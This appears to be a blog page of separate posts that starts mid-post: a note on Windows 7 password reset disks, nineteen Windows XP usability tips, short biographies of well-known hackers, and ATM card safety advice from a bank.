NOTE: Windows will honor only the most recent Password reset disk that you have created, so in case you happen to create more than one disk, only the one which is latest will work, all other old password reset disk will not be able to reset the Windows 7 Password.


If you have not created a reset disk and have forgotten your password, you can still reset the password using some utilities like Windows Password Recovery Tool. But these processes may cost you little money if you need to buy a software to do that. So to avoid any inconvenience later, we recommend that you create a password reset disk.

19 Little Kown Facts Of Windows Xp


Windows XP happens to be one of the most popular operating
systems from the Windows Family. I Just don’t like Vista because it really isn’t able to match upto Windows XP on similar loads and conditions. So here are some tricks that will give you a lot of extra muscle to use your Windows Machine.

  1. Windows XP boasts of how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to run and type systeminfo and you can see a lot of nice data about your Windows installation.

  2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type gpedit.msc then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care — some may stop your computer behaving as you wish.

  3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter ‘rundll32.exe user32.dll,LockWorkStation’ in the location field. Give the shortcut a name you like. That’s it — just double click on it and your computer will be locked. And if that’s not easy enough, Windows key + L will do the same.

  4. Windows XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word ‘hide’ and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

  5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include ‘eventcreate’ and ‘eventtriggers’ for creating and watching system events, ‘typeperf’ for monitoring performance of various subsystems, and ‘schtasks’ for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options — they’re all far too baroque to go into here.

  6. XP has IP version 6 support — the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type ‘ipv6 install’ into Run… (it’s OK, it won’t ruin your existing network setup) and then ‘ipv6 /?’ at the command line to find out more. If you don’t know what IPv6 is, don’t worry and don’t bother.

 7. You can at last get rid of tasks on the computer from the command line by using ‘taskkill /pid’ and the task number, or just ‘tskill’ and the process number. Find that out by typing ‘tasklist’, which will also tell you a lot about what’s going on in your system.

  8. XP will treat Zip files like folders, which is nice if you’ve got a fast machine. On slower machines, you can make XP leave zip files well alone by typing ‘regsvr32 /u zipfldr.dll’ at the command line. If you change your mind later, you can put things back as they were by typing ‘regsvr32 zipfldr.dll’.

  9. XP has ClearType — Microsoft’s anti-aliasing font display technology — but doesn’t have it enabled by default. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

  10. You can use Remote Assistance to help a friend who’s using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum’s real IP address — they can find this out by going to www.whatismyip.com, and get them to make sure that they’ve got port 3389 open on their firewall and forwarded to the errant computer.

  11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As… and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

  12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

  13. You can start up without needing to enter a user name or password. Select Run… from the start menu and type ‘control userpasswords2′, which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatic Log On dialog box will appear; enter the user name and password for the account you want to use.

 14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options… and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

  15. XP comes with a free Network Activity Light, just in case you can’t see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You’ll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

  16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

  17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By… Show In Groups.

 18. Windows Media Player will display the cover art for albums as it plays the tracks — if it found the picture on the Internet when you copied the tracks from the CD. If it didn’t, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

  19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

So this is it.. I hope that these tips are useful to you all.. Some of these tips are what i have discovered by accident and the rest are thanks to a variety of sources on the internet.

Famous Hackers



Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer — before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.

Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.

Richard Stallman, also known as “rms,” founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.

On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) “c0mrade.” Originally sentenced to house arrest, James was sent to prison when he violated parole.

Greg Finley/Getty Images
Hacker Kevin Mitnick, newly released from the Federal Correctional Institution in Lompoc, California.

Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick’s reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI’s Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.

Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He’s famous for hacking the phones of a radio station called KIIS-FM. Poulsen’s hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he’s famous for being a senior editor at Wired magazine.

Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.

It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand. Others know what they’re doing so well that they can slip in and out of systems without anyone ever knowing.

Safety Tips for Card operations

Do’s Don’ts











PIN change

Please memorise your PIN and destroy the PIN mailer.
 Change your PIN periodically by choosing “PIN change” option.
 Ensure complete privacy while entering your PIN in the ATM.
 Use your hand or body to shield your PIN from onlookers

Cash Withdrawal
 Enter amount only in multiples of Rs 50 or Rs 100.
 Collect cash immediately, else currency will be retracted into the
ATM.

Deposit
 Choose “Deposit” option. Fill challan and place it with currency
notes/cheques in envelope dispensed by ATM. Seal envelope and
insert in deposit slot. Retain transaction slip.

Purchases
Always remember to take your Card and transaction slip once your
transaction is completed in a shop or hotel.

Important
 Always note to take your card from the ATM before you leave, else
card will be retracted into the ATM.
 Ensure that you have signed on signature panel on reverse of card.
 In case your card is LOST, please advise branch immediately
against acknowledgement.
 Periodically check your statements or pass book to verify the
account balance and transactions
 Contact your bank immediately if your card is lost, stolen or subject
to fraudulent use
 Keep your receipts. Tear up or shred receipts before throwing them
away after checking your statement. .



Don’t Do’s

PIN change

Do not write your PIN on the card or keep it along with the card.
Do not enter wrong PIN repeatedly; else the card will require
revalidation.
Do not share your PIN number with anyone
 Do not use birth dates, telephone numbers or simple combinations
like 1234 / 4321 / 8888 / etc.

Deposit
Do not deposit more than forty notes.
Do not use staples, pins or clips.
 Do not deposit coins.
 Do not fold currency notes and cheques.

Purchases
Do not let your Card out of your sight when making a purchase or
at hotels and petrol stations. Ensure that the card is swiped in your
presence.

Important
Do not allow other people to use your card.
Do not allow your attention to be diverted while transacting. Do not take assistance from unknown persons to operate ATM.
Do not use an ATM if it looks suspicious, it could be a skimming
device.
Do not expose your card to direct sunlight, magnetic fields, X-rays.
Do not use cell phones while inside the ATM room.
 Do not allow other people to enter when you use the ATM.
 Do not enter ATM room when ATM is already in use.
Do not litter the floor. Please use the waste paper basket.